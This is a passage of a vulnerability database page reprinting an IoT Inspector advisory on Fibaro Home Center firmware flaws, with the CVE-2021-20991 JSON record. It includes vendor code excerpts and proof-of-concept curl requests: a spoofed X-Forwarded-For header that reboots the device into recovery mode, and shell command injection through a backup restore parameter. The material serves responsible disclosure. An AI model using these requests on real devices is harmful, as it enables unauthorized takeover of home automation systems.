    A similar problem exists for remote support connections:
    
    
    
    ./opt/fibaro/scripts/remote-support.lua
    
    <snip>
    
    function handleResponse(response)
    
      responseJson = json.decode(response.data)
    
      print(json.encode(responseJson))
    
    
    
      local autoSSHCommand = 'ssh -y -K 30 -i
    /etc/dropbear/dropbear_rsa_host_key -R '  .. responseJson.private_ip..  ':'
    .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip
    
      os.execute(autoSSHCommand)
    
    end
    
    
    
    function getSupportData()
    
      remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint='
    .. serialNumber .. '&HW_Key=' .. HWKey
    
      print(remoteUrl)
    
    
    
      http = net.HTTPClient({timeout = 5000})
    
    
    
      http:request(remoteUrl, {
    
        options = {
    
          method = 'GET'
    
        },
    
        success = function(response)
    
          handleResponse(response)
    
        end,
    
        error = function(error)
    
          print(error)
    
        end
    
      })
    
    end
    
    
    
    getSupportData()
    
    </snip>
    
    
    
    Here, the remote support endpoint returns the following data:
    
    {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY
    .ZZZ"}
    
    
    
    The same dropbear ssh client is used with option -y. In this case, port 22 
    
    (ssh) is made accessible through the port-forward. However, the device only 
    
    allows public key authentication with a hard-coded SSH key. No further
    testing 
    
    has been done on compromising the support SSH connection. 
    
    
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode
    
    
    
    The device is running a nginx server, which forwards some requests to a 
    
    lighttpd server (8000) for further processing:
    
    <snip>
    
                                    proxy_set_header X-Forwarded-For
    $proxy_add_x_forwarded_for;
    
    
    
            location ~* \.php$ {
    
                proxy_pass   http://127.0.0.1:8000;
    
            }
    
    
    
            location ~* \.php\?.* {
    
                proxy_pass   http://127.0.0.1:8000;
    
            }
    
    </snip>
    
    
    
    The lighttpd server is not only accessible locally, but also via the local 
    
    network. 
    
    
    
    Authentication and authorization is implemented in PHP and there is a
    special 
    
    check for connections originating from within the host. However, when
    checking 
    
    the remote IP address, the header X-Forwarded-For is also considered:
    
    
    
    ./var/www/authorize.php
    
    <snip>
    
    function isLocalRequest()
    
    {
    
        $ipAddress = "";
    
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) 
    
            $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    
        else
    
            $ipAddress = $_SERVER['REMOTE_ADDR'];
    
    
    
        $whitelist = array( '127.0.0.1', '::1' );
    
        if(in_array($ipAddress, $whitelist))
    
            return true;
    
    
    
        return false;
    
    }
    
    </snip>
    
    
    
    As the lighttpd service available via the network, an attacked can inject
    the 
    
    required header X-Forwarded-For as well. 
    
    
    
    The check isLocalRequest is used to "secure" multiple endpoints:
    
    
    
    ./var/www/services/system/shutdown.php
    
    <snip>
    
    <?php
    
        require_once("../../authorize.php");
    
    
    
        if (!isLocalRequest() && !isAuthorized())
    
        {
    
           sendUnauthorized();
    
        }
    
        else
    
        {
    
            exec("systemShutdown");
    
        }
    
    ?>
    
    </snip>
    
    
    
    ./var/www/services/system/reboot.php
    
    <snip>
    
    
    
    function authorize() 
    
    {
    
        return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,
    role::INSTALLER));
    
    }
    
    
    
    function handlePOST($text)
    
    {
    
        if (!isLocalRequest() && !authorize())
    
        {
    
           sendUnauthorized();
    
           return;
    
        }
    
    
    
        $params = tryDecodeJson($text);
    
        if(!is_null($params) && isset($params->recovery) && $params->recovery
    === true)
    
            exec("rebootToRecovery");
    
        else
    
            exec("systemReboot");
    
    }
    
    
    
    $requestBody = file_get_contents('php://input');
    
    $requestMethod = $_SERVER['REQUEST_METHOD'];
    
    
    
    if ($requestMethod == "POST") 
    
        handlePOST($requestBody);
    
    else 
    
        setStatusMethodNotAllowed();
    
    
    
    </snip>
    
    
    
    An attacker can issue the the following HTTP request to reboot the device
    into 
    
    recovery mode:
    
    curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d
    '{"recovery":true}'  http://DEVICE:8000/services/system/reboot.php
    
    
    
    In recovery mode, firmware images can be updated without authentication. 
    
    
    
    
    
    3) Authenticated remote command execution (versions before 4.550)
    
    
    
    Backup & restore operations could be triggered though HTTP endpoints:
    
    
    
    ./var/www/services/system/backups.php
    
    <snip>
    
    function restoreBackup($params)
    
    {
    
        if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)
    
        {
    
            setStatusTooManyRequests();
    
            return;
    
        }
    
    
    
        $type = $params->type;
    
        $id = $params->id;
    
        $version = $params->version;
    
    
    
        if (is_null($id) || !is_numeric($id) || $id < 1 ) 
    
        {
    
            setStatusBadRequest();
    
            return;
    
        }
    
    
    
        $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");
    
    
    
        if ($type == "local" && $hcVersion == "HC2" || $type == "remote") 
    
        {
    
            $version ?
    
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
    $id . ' ' . $version) :
    
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
    $id);
    
        }
    
        else 
    
        {
    
            setStatusBadRequest();
    
            return;
    
        }
    
    
    
        setStatusAccepted();
    
    }
    
    </snip>
    
    
    
    The parameter $version is not sanitized or escaped, which allows an attacker
    to 
    
    inject shell commands into the exec() call:
    
    
    
    cat > /tmp/exploit <<- EOM
    
    {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1;
    INJECTED COMMAND"}}
    
    EOM
    
    
    
    curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type:
    application/json' -d@/tmp/exploit  http://DEVICE/services/system/backups.php
    
    
    
    
    Version 4.550 and later have proper escaping:
    
    <snip>
    
        $version = escapeshellarg($params->version);
    
    </snip>
    
    
    
    
    
    4) Unencrypted management interface
    
    
    
    NMMAP shows a few open ports on the box:
    
    PORT     STATE SERVICE
    
    22/tcp   open  ssh
    
    80/tcp   open  http
    
    8000/tcp open  http-alt
    
    
    
    Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. 
    
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

    Vulnerable / tested versions:


    Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version

    at the time of the discovery

    Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530

    Solution:


    Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1,

    2 and 3.

    Vulnerability 4 is not fixed as the vendor assumes that the local network is

    trusted and the device only provides wired network access. Furthermore, the

    vendor recommends using the cloud-based management interface, which is

    accessible over HTTPS and requests are forwarded via an encrypted SSH

    connection between the Fibaro cloud and the device.

    Advisory URL:


    https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

    Vendor contact timeline:


    2020-11-18: Contacting Fibaro through support@fibaro.com,

            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com
    

    2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn

    2020-11-24: Adivsory sent to Fibaro by email

    2020-12-01: Fibaro confirmed the receipt of the advisory

    2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes

    2021-03-16: Fibaro beta release (4.601) with the fixes

    2021-03-24: Fibaro applies for CVE numbers

    2021-03-31: Fibaro GA release (4.610) with the fix

    2021-04-08: IoT Inspector Research Lab publishes advisory

    ~~~
    
    
    
    The IoT Inspector Research Lab is an integrated part of IoT Inspector. 
    
    
    
    IoT Inspector is a platform for automated security analysis and compliance 
    
    checks of IoT firmware. Our mission is to secure the Internet of Things. In 
    
    order to discover vulnerabilities and vulnerability patterns within IoT
    devices
    
    and to further enhance automated identification that allows for scalable 
    
    detection within IoT Inspector, we conduct excessive security research in
    the
    
    area of IoT. 
    
    
    
    Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT 
    
    firmware, we aim to responsibly disclose relevant information to the vendor
    
    of the affected IoT device as well as the general public in a way that 
    
    minimizes potential harm and encourages further security analyses of IoT 
    
    systems. 
    
    
    
    You can find our responsible disclosure policy here:
    
    https://www.iot-inspector.com/responsible-disclosure-policy/
    
    
    
    
    
    

    ~~~

    Interested in using IoT Inspector for your research or product?

    Mail: research at iot-inspector dot com

    Web: https://www.iot-inspector.com

    Blog: https://www.iot-inspector.com/blog/

    Twitter: https://twitter.com/iotinspector

    EOF Marton Illes / @2021

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0489",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "home center lite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.540"
          },
          {
            "model": "home center 2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.540"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marton Illes",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-20991",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-20991",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-20991",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "info@cert.vde.com",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-20991",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-20991",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-20991",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-1334",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-20991",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "In Fibaro Home Center 2 and Lite devices with firmware version 4.540 and older an authenticated user can run commands as root user using a command injection vulnerability. IoT Inspector Research Lab Advisory IOT-20210408-0\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n             title: Multiple vulnerabilities \n\n    vendor/product: Fibaro Home Center Light / Fibaro Home Center 2\n\n                    https://www.fibaro.com/\n\nvulnerable version: 4.600 and older\n\n     fixed version: 4.610\n\n        CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n\n                    CVE-2021-20992\n\n            impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    9.8 (critical)\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n                    8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n          reported: 2020-11-18\n\n       publication: 2021-04-08\n\n                by: Marton Illes, IoT Inspector Research Lab\n\n                    https://www.iot-inspector.com/\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO\u0027s headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. 250 employees.\"\n\n \n\nhttps://www.fibaro.com/en/about-us/\n\n \n\n \n\nVulnerability overview/description:\n\n-----------------------------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)\n\nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n\nremote access and remote support capabilities. This connection can be \n\nintercepted using a man-in-the-middle attack and a device initiated remote \n\nport-forward channel can be used to connect to the web management interface. \n\n\nIoT Inspector identified a disabled SSH host key check, which enables \n\nman-in-the-middle attacks. \n\n \n\nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n\ncommunication between the user and the device. As communication inside the \n\nSSH port-forward is not encrypted (see #4 on management interface), user \n\nsessions, tokens and passwords can be hijacked. \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n\n(CVE-2021-20990)\n\nAn internal management service is accessible on port 8000 and some API \n\nendpoints could be accessed without authentication to trigger a shutdown, a \n\nreboot, or a reboot into recovery mode. In recovery mode, an attacker can \n\nupload firmware without authentication. \n\nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n\nICS Cert: https://securelist.com/fibaro-smart-home/91416/\n\n \n\n4) Unencrypted management interface (CVE-2021-20992)\n\nHome Center devices provide a web based management interface over\nunencrypted \n\nHTTP protocol. Communication between the user and the device can be \n\neavesdropped to hijack sessions, tokens, and passwords. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device. \n\n \n\n \n\nProof of concept:\n\n-----------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack\n\n \n\nHome Center devices initiate a SSH connection to the Fibaro cloud\n\n \n\n \n\n./etc/init.d/fibaro/RemoteAccess\n\n \n\n\u003csnip\u003e\n\nDAEMON=/usr/bin/ssh\n\n \n\n.... \n\n \n\ncase \"$1\" in\n\n  start)\n\n    \n\n                ..... \n\n \n\n    # get IP\n\n    local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}\u0026HW_Key=${HW_Key}\"\n\n    local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n    # get PORT\n\n    local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}\u0026HW_Key=${HW_Key}\"\n\n    local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n                .... \n\n                \n\n    start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\nremote2@\"${IP_Response}\"\n\n\u003c/snip\u003e\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. Once the connection is authenticated, the client initiates a\nremote \n\nport-forward:\n\n-R \"${PORT_Response}\":localhost:80\n\n \n\nThis enables the attacker to access port 80 (management interface) of the \n\ndevice. \n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n\u003csnip\u003e\n\nfunction handleResponse(response)\n\n  responseJson = json.decode(response.data)\n\n  print(json.encode(responseJson))\n\n \n\n  local autoSSHCommand = \u0027ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \u0027  .. responseJson.private_ip..  \u0027:\u0027\n.. responseJson.port .. \u0027:localhost:22 remote2@\u0027 .. responseJson.ip\n\n  os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n  remoteUrl=\u0027https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=\u0027\n.. serialNumber .. \u0027\u0026HW_Key=\u0027 .. HWKey\n\n  print(remoteUrl)\n\n \n\n  http = net.HTTPClient({timeout = 5000})\n\n \n\n  http:request(remoteUrl, {\n\n    options = {\n\n      method = \u0027GET\u0027\n\n    },\n\n    success = function(response)\n\n      handleResponse(response)\n\n    end,\n\n    error = function(error)\n\n      print(error)\n\n    end\n\n  })\n\nend\n\n \n\ngetSupportData()\n\n\u003c/snip\u003e\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection. \n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n\u003csnip\u003e\n\n                                proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n                                \n\n        location ~* \\.php$ {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n \n\n        location ~* \\.php\\?.* {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n\u003c/snip\u003e\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork. \n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n\u003csnip\u003e\n\nfunction isLocalRequest()\n\n{\n\n    $ipAddress = \"\";\n\n    if(!empty($_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027])) \n\n        $ipAddress = $_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027];\n\n    else\n\n        $ipAddress = $_SERVER[\u0027REMOTE_ADDR\u0027];\n\n \n\n    $whitelist = array( \u0027127.0.0.1\u0027, \u0027::1\u0027 );\n\n    if(in_array($ipAddress, $whitelist))\n\n        return true;\n\n \n\n    return false;\n\n}\n\n\u003c/snip\u003e\n\n \n\nAs the lighttpd service available via the network, an attacked can inject\nthe \n\nrequired header X-Forwarded-For as well. \n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n\u003csnip\u003e\n\n\u003c?php\n\n    require_once(\"../../authorize.php\");\n\n \n\n    if (!isLocalRequest() \u0026\u0026 !isAuthorized())\n\n    {\n\n       sendUnauthorized();\n\n    }\n\n    else\n\n    {\n\n        exec(\"systemShutdown\");\n\n    }\n\n?\u003e\n\n\u003c/snip\u003e\n\n \n\n./var/www/services/system/reboot.php\n\n\u003csnip\u003e\n\n \n\nfunction authorize() \n\n{\n\n    return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n    if (!isLocalRequest() \u0026\u0026 !authorize())\n\n    {\n\n       sendUnauthorized();\n\n       return;\n\n    }\n\n \n\n    $params = tryDecodeJson($text);\n\n    if(!is_null($params) \u0026\u0026 isset($params-\u003erecovery) \u0026\u0026 $params-\u003erecovery\n=== true)\n\n        exec(\"rebootToRecovery\");\n\n    else\n\n        exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents(\u0027php://input\u0027);\n\n$requestMethod = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\n \n\nif ($requestMethod == \"POST\") \n\n    handlePOST($requestBody);\n\nelse \n\n    setStatusMethodNotAllowed();\n\n \n\n\u003c/snip\u003e\n\n \n\nAn attacker can issue the the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H \u0027X-Forwarded-For: 127.0.0.1\u0027 -H \u0027Content-Type: application/json\u0027 -d\n\u0027{\"recovery\":true}\u0027  http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, firmware images can be updated without authentication. \n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup \u0026 restore operations could be triggered though HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n\u003csnip\u003e\n\nfunction restoreBackup($params)\n\n{\n\n    if (getNumberOfInstances(\u0027{screen} SCREEN -dmS RESTORE\u0027) \u003e 0)\n\n    {\n\n        setStatusTooManyRequests();\n\n        return;\n\n    }\n\n \n\n    $type = $params-\u003etype;\n\n    $id = $params-\u003eid;\n\n    $version = $params-\u003eversion;\n\n \n\n    if (is_null($id) || !is_numeric($id) || $id \u003c 1 ) \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n    if ($type == \"local\" \u0026\u0026 $hcVersion == \"HC2\" || $type == \"remote\") \n\n    {\n\n        $version ?\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id . \u0027 \u0027 . $version) :\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id);\n\n    }\n\n    else \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    setStatusAccepted();\n\n}\n\n\u003c/snip\u003e\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat \u003e /tmp/exploit \u003c\u003c- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 -H \u0027content-type:\napplication/json\u0027 -d@/tmp/exploit  http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n\u003csnip\u003e\n\n    $version = escapeshellarg($params-\u003eversion);\n\n\u003c/snip\u003e\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNMMAP shows a few open ports on the box:\n\nPORT     STATE SERVICE\n\n22/tcp   open  ssh\n\n80/tcp   open  http\n\n8000/tcp open  http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530\n\n \n\nSolution:\n\n---------\n\nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities\n1, \n\n2 and 3. \n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device. \n\n \n\n \n\nAdvisory URL:\n\n-------------\n\nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/\n\n \n\n \n\nVendor contact timeline:\n\n------------------------\n\n2020-11-18: Contacting Fibaro through support@fibaro.com, \n\n            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com\n\n2020-11-23: Contacting Fibaro on Facebook \u0026 LinkedIn, got response on\nLinkedIn\n\n2020-11-24: Adivsory sent to Fibaro by email\n\n2020-12-01: Fibaro confirmed the receipt of the advisory\n\n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes\n\n2021-03-16: Fibaro beta release (4.601) with the fixes\n\n2021-03-24: Fibaro applies for CVE numbers\n\n2021-03-31: Fibaro GA release (4.610) with the fix\n\n2021-04-08: IoT Inspector Research Lab publishes advisory\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n\n \n\nIoT Inspector is a platform for automated security analysis and compliance \n\nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n\norder to discover vulnerabilities and vulnerability patterns within IoT\ndevices\n\nand to further enhance automated identification that allows for scalable \n\ndetection within IoT Inspector, we conduct excessive security research in\nthe\n\narea of IoT. \n\n \n\nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n\nfirmware, we aim to responsibly disclose relevant information to the vendor\n\nof the affected IoT device as well as the general public in a way that \n\nminimizes potential harm and encourages further security analyses of IoT \n\nsystems. \n\n \n\nYou can find our responsible disclosure policy 